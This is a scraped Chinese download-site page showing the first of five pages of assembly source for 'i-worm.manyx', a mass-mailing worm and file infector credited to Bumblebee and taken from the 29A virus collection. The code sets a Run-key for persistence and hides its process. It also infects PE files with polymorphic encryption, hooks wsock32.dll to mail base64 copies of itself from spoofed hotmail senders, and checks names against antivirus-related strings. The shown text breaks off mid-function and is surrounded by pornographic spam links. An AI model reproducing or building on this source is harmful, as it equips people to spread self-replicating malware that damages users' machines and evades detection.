亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關(guān)于我們
? 蟲蟲下載站

?? 29a-7.008

?? 從29A上收集的病毒源碼
?? 008
?? 第 1 頁 / 共 5 頁
字號:

;
; i-worm.manyx
; Coded by Bumblebee
;
; DISCLAIMER -
;
; THIS IS THE SOURCE CODE OF A VIRUS/WORM.
;
; IN NO EVENT SHALL THE AUTHOR OF THIS PROGRAM BE LIABLE FOR ANY DIRECT,
; INDIRECT,  INCIDENTAL,  SPECIAL,  EXEMPLARY,  OR CONSEQUENTIAL DAMAGES
; ARISING   IN   ANY   WAY   OUT   OF   THE   USE   OF   THIS  SOFTWARE.
;
; USE  IT AT YOR OWN RISK,  OR DON'T USE IT.  BUT DON'T  FUCK THE CODER!
;
; Some comments:
;
; Think about it as a main body able to install some of its parts (those
; parts are not a complete virus, only the needed stuff to let the  main
; body keep on spreading). When one of those  parts  is  installed,  the
; rest can be removed from the system and the piece still work.
; The way each part work is very determined by the main body. That seems
; so logical for an infected file (the polymorphic  code  usually  never
; changes once the file is  infected), but  is  also  applied  to  wsock
; infection. That is what i call 'slow behavior'.
; However there is a little random part, but is not very important after
; all.
;
; There follows a brief for each part:
;
;  main body: infect wsock32.dll, install, payload and infect PE files
;  wsock32.dll: hook smtp sessions to send a copy of the main body
;  infected file: drop and exec main body
;
; Notice the infected files will exec main body EVER, no matter  if  it
; is installed yet. In that way  the  virus  act  as  a  direct  action
; infector, even infected sample won't infect other files. That's  due,
; once the main body is installed, it will infect all files in  current
; directory (work directory). That means when an  infected  notepad  is
; called by explorer for reading a txt file, it will try  to  drop  the
; main body and exec it. At this point the work directory of  the  main
; body will be notepad's one, so it will  infect  files  there  as  the
; classical direct action infector does.
;
; The only data fixed is the filename where the main body is  saved  in
; each drop. Some random data is based in the C HDD volume name and, in
; wsock case, in the stack of the app sending the  mail.  The  infected
; samples will come from random hotmail address. I know that's not fair
; but most smtp and esmtp servers today check the sender domain exists.
; I'm sure ISPs won't block all hotmail mails (sexyfun.net  is  blocked
; in several ones huehuehue).
;
; Why ios.sys? Simple: it exists in DOS 6.22 (i'm not sure  if  older).
; Due to this is a name you're used to, and you won't delete it.  Win9x
; have a io.sys file, but not ios (at least until you're not infected).
;
; Why the installation name is 8 random letter? Because Hybris and  may
; be other viruses use the same way. A confused user is  nice  when  he
; needs to find help.
;
; Why some strings are encrypted in main body and others not? mmm  I've
; encrypted only some that may show as suspicious. Anyway  it  is  only
; a protection before the file is installed,  and  no  matter  if  that
; ABFDGABC.exe has suspicious strings or not. If you got it, IT'S  VERY
; SUSPICIOUS. In the same way, if the user  peeps  into  wsock32.dll...
; The fact is tested av were not able to detect it in 1st place.
;
; Sometimes filenames found into personal folder (usually my documents)
; will be used to generate the mail to send. Sometimes not. The wsock32
; hook is intended to be full compatible and stable (in fact  it  works
; fine with both blocking and non-blocking sockets, no matter how  slow
; is the connection with the smtp server and what mta you use).
;
; I've coded it with win98 in mind, thus  it  is  the  most  widespread
; win32 compliant system. Indeed most parts will work  in  most  win32.
;
; It uses base64 and MIME 1.0, the payload is not destructive but clear
; enough (and annoying), and there are no comments in the source :)
;
; Have fun.
;
; - main.asm BOF -

%include "win32n.inc"

[extern ExitProcess]
[extern CreateFileMappingA]
[extern GetLastError]

[segment .text]
[global main]

main:
        call    stealthProc

        call    initAux
        jc      exitApp

        call    installMailHook

        call    install
        jnc     exitDeinitApp

        xor     eax,eax
        push    dword regName
        push    dword 1024
        push    eax
        push    dword 4
        push    eax
        dec     eax
        push    eax
        call    CreateFileMappingA
        or      eax,eax
        jz      exitDeinitApp

        push    eax
        call    GetLastError
        pop     ecx
        cmp     eax,0b7h
        je      exitDeinitApp

        push    ecx

        not     dword [fmask]
        call    scandirpe

        call    payload

        call    CloseHandle

exitDeinitApp:
        call    deInitAux

exitApp:
        push    dword 0
        call    ExitProcess

%include "auxf.inc"
%include "payload.inc"
%include "install.inc"
%include "infectpe.inc"
%include "poly.inc"
%include "findfiles.inc"
%include "process.inc"
%include "wsock.inc"

[segment .data]

seed            dd      87654321h
iname           db      '\'
fname           db      0,0,0,0,0,0,0,0
                dd      ~'.exe'
                db      0
regKey          db      "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0
regName         db      0,0,0,0,0
hkey            dd      0
drive           db      'c:\',0

encTable        db      'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv'
                db      'wxyz0123456789+/'

fmask           dd      ~"*.ex"
                db      'e',0
findHnd         dd      0

perPath         db      "SOFTWARE\Microsoft\Windows\CurrentVersion"
                db      "\Explorer\Shell Folders",0
perValue        db      "Personal",0
PersonalPs      dd      128
fmaskall        dd      ~"*.*"

kernel32dll     db      'KERNEL32.DLL',0
registerSrvProc db      'RegisterServiceProcess',0

wsock32dllp     db      '\'
wsock32dll      dd      ~'wsoc',~'k32.'
                db      'dll',0

wininitstr      dd      ~'[ren',~'ame]'
                db      0dh,0ah
wininitstrLen   equ     $-wininitstr
wininit         dd      ~'\win'
                db      'init.ini',0

dropCode:
%include "dropit.inc"

wsockCode:
%include "wsockhook.inc"

[segment .bss]

memory          resd    1
attachment      resd    1
vsize           resd    1
swidth          resd    1
sheight         resd    1
localtime       resd    4
fHnd            resd    1
mapMem          resd    1
fhmap           resd    1
fileTime0       resd    2
fileTime1       resd    2
fileTime2       resd    2
fileAttrib      resd    1
fileSize        resd    1
padding         resd    1
ccKey           resd    1

poly            resd    1
polySize        resd    1
crptBegin       resd    1
registers       resd    8
freer           resd    1
rIdx            resd    1
rCnt            resd    1
vKey            resd    1
mKey            resd    1
vIdx            resd    1
vCnt            resd    1
lCnt            resd    1
kStack          resd    MAXLAYER 
mStack          resd    MAXLAYER 
finddata:
        dwFileAttributes resd  1
        dwLowDateTime0  resd   1
        dwHigDateTime0  resd   1
        dwLowDateTime1  resd   1
        dwHigDateTime1  resd   1
        dwLowDateTime2  resd   1
        dwHigDateTime2  resd   1
        nFileSizeHigh   resd   1
        nFileSizeLow    resd   1
        dwReserved      resd   2
        cFileName       resb   260
        cAlternateFilename resb 16

PersonalP       resb 128

; - main.asm EOF -
; - payload.inc BOF -

[extern GetDesktopWindow]
[extern LoadIconA]
[extern GetWindowDC]
[extern DrawIcon]
[extern GetSystemMetrics]
[extern GetLocalTime]

payload:
        push    dword localtime
        call    GetLocalTime
        lea     esi,[localtime]
        test    word [esi+2],1
        jnz     doRet
        cmp     word [esi+6],5
        jne     doRet
        test    word [esi+8],8
        jz      doRet
        mov     al,0c3h
doRet   equ     $-1

        push    dword SM_CXFULLSCREEN
        call    GetSystemMetrics
        mov     [swidth],eax

        push    dword SM_CYFULLSCREEN
        call    GetSystemMetrics
        mov     [sheight],eax

        push    dword 32517 ; IDI_WINLOGO
        push    dword 0
        call    LoadIconA

        push    eax

        call    GetDesktopWindow

        push    eax
        call    GetWindowDC

        pop     esi
        mov     edi,eax

iconLoop:
        push    esi
        push    dword [sheight]
        call    rnd
        push    eax
        push    dword [swidth]
        call    rnd
        push    eax
        push    edi
        call    DrawIcon
        jmp     iconLoop

; - payload.inc EOF -

; - auxf.inc BOF -

[extern GetTickCount]
[extern GetModuleFileNameA]
[extern GlobalAlloc]
[extern GlobalFree]
[extern CreateFileA]
[extern GetFileSize]
[extern ReadFile]
[extern CloseHandle]

initAux:
        push    ebp
        mov     ebp,esp
        sub     esp,260
        push    ebp
        sub     ebp,260

        push    dword localtime
        call    GetLocalTime

        call    GetTickCount
        add     eax,dword [localtime+8]
        add     [seed],eax

        push    dword 260
        push    ebp
        push    dword 0
        call    GetModuleFileNameA
        or      eax,eax
        jz      near initAuxKO

        push    dword 0
        push    dword 80h
        push    dword 3
        push    dword 0
        push    dword 1
        push    dword 80000000h
        push    ebp
        call    CreateFileA
        inc     eax
        jz      near initAuxKO
        dec     eax

        push    eax
        push    dword 0
        push    eax
        call    GetFileSize
        pop     esi
        mov     edi,eax

        mov     dword [vsize],eax
        mov     dword [dropSize],eax

        add     eax,5
        push    eax
        add     eax,eax
        add     eax,eax
        add     eax,eax
        add     eax,eax
        push    eax
        push    dword GMEM_FIXED
        call    GlobalAlloc
        or      eax,eax
        jz      near initAuxKO

        mov     [memory],eax
        pop     ecx
        add     ecx,eax
        mov     [attachment],ecx

        push    dword 0h
        push    ebp
        push    edi
        push    eax
        push    esi
        call    ReadFile

        push    esi
        call    CloseHandle

        mov     eax,[vsize]
        xor     edx,edx
        mov     ecx,3
        div     ecx
        or      edx,edx
        jz      incredible
        inc     eax
incredible:
        mul     ecx
        mov     ecx,eax
        mov     eax,[memory]
        mov     edx,[attachment]
        call    encodeBase64
        mov     [attachmentSize],ecx

otherKeyPlz:
        push    dword 0ffh
        call    rnd
        or      al,al
        jz      otherKeyPlz
        mov     [ccKey],al
        mov     [cKey],al

        mov     esi,[memory]
        xor     eax,eax
        mov     al,[ccKey]
        mov     ecx,[dropSize]
encryptItLoop:
        not     byte [esi]
        xor     byte [esi],al
        inc     ax
        inc     esi
        loop    encryptItLoop

        call    genFileName

        mov     eax,(MAXPOLY*MAXLAYER)
        add     eax,dropperSize+5
        add     eax,[vsize]
        push    eax
        push    dword GMEM_FIXED
        call    GlobalAlloc
        or      eax,eax
        jz      initAuxKO

        mov     [poly],eax

        call    getPersonal

        clc
        mov     al,0f9h
initAuxKO       equ $-1
        pop     ebp
        leave
        ret

deInitAux:
        push    dword [poly]
        call    GlobalFree

        push    dword [memory]
        call    GlobalFree
        ret

genFileName:
        lea     edi,[fname]
        mov     ecx,8
        not     dword [edi+ecx]
fileName:
        push    ecx
        push    dword 10
        call    rnd
        pop     ecx
        add     eax,'A'
        stosb
        loop    fileName
        ret

rnd:
        mov     eax,[seed]
        imul    eax,9E3779B9h
        shr     eax,16
        add     [seed],eax
        xor     edx,edx
        mov     ecx,[esp+4]
        div     ecx
        mov     eax,edx
        retn    4

getPersonal:
        push    dword hkey
        push    dword 0
        push    dword 0
        push    dword perPath
        push    dword HKEY_CURRENT_USER
        call    RegOpenKeyExA
        or      eax,eax
        jnz     personalKO

        push    dword PersonalPs
        push    dword PersonalP
        push    eax
        push    eax
        push    dword perValue
        push    dword [hkey]
        call    RegQueryValueExA
        or      eax,eax
        jnz     personalKO

        push    dword [hkey]
        call    RegCloseKey

        mov     byte [pflag],1
outtaPersonal:
        ret
personalKO:
        mov     byte [pflag],0
        jmp     outtaPersonal

isAV:
        push    edi
UCaseLoop:
        cmp     byte [edi],'a'
        jb      notUCase
        cmp     byte [edi],'z'
        ja      notUCase
        sub     byte [edi],'a'-'A'
notUCase:
        inc     edi
        mov     al,[edi]
        or      al,al
        jnz     UCaseLoop
        pop     edi
avStrLoop:
        mov     ax,word [edi]
        not     ax
        cmp     ax,~'AV'
        je      itIsAV
        cmp     ax,~'DR'
        je      itIsAV
        cmp     ax,~'SP'
        je      itIsAV
        cmp     ax,~'F-'
        je      itIsAV
        cmp     ax,~'AN'
        je      itIsAV
        cmp     ax,~'VE'
        je      itIsAV
        cmp     ax,~'CL'
        je      itIsAV
        cmp     ax,~'ON'
        je      itIsAV
        not     ax
        inc     edi
        or      ah,ah
        jnz     avStrLoop

        clc
        mov     al,0f9h
itIsAV  equ $-1
        ret

encodeBase64:
        xor     esi,esi
        lea     edi,[encTable]
        push    ebp
        xor     ebp,ebp
baseLoop:

        xor     ebx,ebx
        mov     bl,byte [eax]
        shr     bl,2
        and     bl,00111111b
        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi

        mov     bx,word [eax]
        xchg    bl,bh
        shr     bx,4
        mov     bh,0
        and     bl,00111111b
        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi

        inc     eax
        mov     bx,word [eax]
        xchg    bl,bh
        shr     bx,6
        mov     bh,0
        and     bl,00111111b
        mov     bh,byte [edi+ebx]
        mov     byte [edx+esi],bh
        inc     esi

        inc     eax
        xor     ebx,ebx
        mov     bl,byte [eax]
        and     bl,00111111b

?? 快捷鍵說明

復(fù)制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
精品福利av导航| 色诱亚洲精品久久久久久| 欧美二区三区91| 亚洲成av人**亚洲成av**| 欧美二区三区91| 国产主播一区二区| 国产日韩欧美高清在线| 99久久精品情趣| 一个色在线综合| 91精品国产丝袜白色高跟鞋| 久久精品国产77777蜜臀| 久久综合九色欧美综合狠狠| 成人精品免费视频| 亚洲日本丝袜连裤袜办公室| 欧美亚洲国产怡红院影院| 日日夜夜精品视频天天综合网| 欧美一区二区三区思思人| 国内久久婷婷综合| 成人免费在线播放视频| 91精彩视频在线观看| 蜜桃视频一区二区| 亚洲国产精品成人综合| 97se亚洲国产综合自在线观| 夜色激情一区二区| 精品国产露脸精彩对白| 成人av在线资源| 天堂成人国产精品一区| 国产亚洲欧美激情| 日本道精品一区二区三区| 日本亚洲欧美天堂免费| 日韩一区中文字幕| 91精品国产乱| 99久久99久久精品免费观看| 日韩国产一区二| 国产精品久久久爽爽爽麻豆色哟哟| 欧美调教femdomvk| 粉嫩绯色av一区二区在线观看 | 亚洲图片欧美色图| 日韩欧美国产精品一区| a亚洲天堂av| 精品在线播放免费| 亚洲精品成人在线| 久久精品夜色噜噜亚洲a∨| 欧美亚洲高清一区| 成人sese在线| 日本中文字幕一区二区视频| 国产精品电影一区二区三区| 欧美一区二区三区四区在线观看 | 伊人色综合久久天天| 精品欧美乱码久久久久久1区2区| 色综合久久中文综合久久97| 久久99国产精品久久99果冻传媒| 亚洲青青青在线视频| 国产亚洲精品aa| 日韩欧美国产综合一区| 日韩精品一区二区三区中文不卡| 风间由美一区二区av101 | 国产精品小仙女| 日韩av中文字幕一区二区三区| 亚洲欧洲日韩女同| 久久久精品综合| 欧美一级夜夜爽| 欧美吻胸吃奶大尺度电影| 91社区在线播放| 成人激情免费电影网址| 国产成人精品综合在线观看| 精品在线观看免费| 老司机精品视频在线| 日韩电影免费在线看| 亚洲综合视频网| 自拍av一区二区三区| 欧美高清在线精品一区| 久久一区二区三区四区| 精品国产精品网麻豆系列 | 欧美午夜在线一二页| 99综合影院在线| 福利一区二区在线| 成人app在线| 成人免费观看av| 成人美女在线视频| 99久久久久久99| 99精品视频在线播放观看| 91一区二区三区在线观看| 成人av免费在线观看| 99国产精品久久久久久久久久久| 成人精品在线视频观看| 91女人视频在线观看| 色综合天天综合网国产成人综合天 | 色综合欧美在线视频区| 99精品视频一区二区三区| 99久久精品免费| 在线视频国内一区二区| 欧洲一区二区三区免费视频| 欧美日韩在线播放三区| 69堂国产成人免费视频| 欧美一区二区二区| 2014亚洲片线观看视频免费| 久久久久久9999| 亚洲欧美一区二区三区久本道91| 亚洲午夜精品网| 九九热在线视频观看这里只有精品| 国产在线播放一区二区三区| 成人激情图片网| 欧美日韩中字一区| 欧美一区二区成人| 国产欧美一区二区三区在线看蜜臀 | 国产成人亚洲综合a∨婷婷| 成人一区在线观看| 一本久久a久久精品亚洲| 欧美日韩一区二区三区四区五区| 日韩一区二区免费在线电影| 国产亲近乱来精品视频| 亚洲一级二级三级| 精品在线一区二区| 色欧美日韩亚洲| 日韩精品一区二区三区视频播放 | 一区二区三区自拍| 免费看精品久久片| 99久久久久久| 欧美va亚洲va在线观看蝴蝶网| 欧美高清在线一区二区| 日韩和欧美的一区| 不卡一卡二卡三乱码免费网站| 欧美揉bbbbb揉bbbbb| 久久久.com| 午夜成人免费电影| 成人h动漫精品| 日韩三级免费观看| 亚洲欧美日韩电影| 国产精品自拍网站| 777欧美精品| 亚洲天堂网中文字| 国产在线精品国自产拍免费| 日本精品一区二区三区高清| 久久久99免费| 免费人成在线不卡| 欧美日韩色一区| 国产精品色婷婷久久58| 免费精品视频最新在线| 欧美三级欧美一级| 亚洲人成网站精品片在线观看| 国产乱国产乱300精品| 欧美性一二三区| 亚洲另类春色国产| 成人三级伦理片| 精品国产乱码久久久久久浪潮| 亚洲妇熟xx妇色黄| 色婷婷av一区二区三区gif| 久久蜜桃一区二区| 日本欧美在线看| 欧美色爱综合网| 亚洲视频在线一区观看| 成人精品视频一区| 国产色一区二区| 国产91精品露脸国语对白| wwww国产精品欧美| 精品无码三级在线观看视频| 欧美一区二区三级| 日韩电影在线观看网站| 欧美色图天堂网| 一区二区高清免费观看影视大全| 91伊人久久大香线蕉| 亚洲视频一区在线观看| 99这里都是精品| 亚洲视频一区二区在线| caoporn国产精品| 国产精品久久777777| jlzzjlzz亚洲女人18| 中文字幕免费观看一区| 成人激情动漫在线观看| 中文字幕一区二区三区视频 | 一区二区三区四区在线播放| 99精品国产91久久久久久| 国产精品久久久久影院色老大| 成人国产视频在线观看| 国产精品国产三级国产普通话99 | 国产视频一区二区三区在线观看| 国产乱妇无码大片在线观看| 国产日韩欧美电影| 99国产精品久久久久| 亚洲色图在线播放| 欧美老年两性高潮| 麻豆成人免费电影| 久久久五月婷婷| aaa欧美大片| 亚洲一区在线看| 日韩欧美国产电影| 国产激情偷乱视频一区二区三区 | 亚洲欧美福利一区二区| 在线精品观看国产| 日韩精品一级二级| 精品国产91久久久久久久妲己| 国产精品一区二区不卡| 国产精品成人在线观看| 欧美在线看片a免费观看| 天涯成人国产亚洲精品一区av| 精品国产青草久久久久福利| 成人激情电影免费在线观看| 伊人夜夜躁av伊人久久| 精品国产网站在线观看|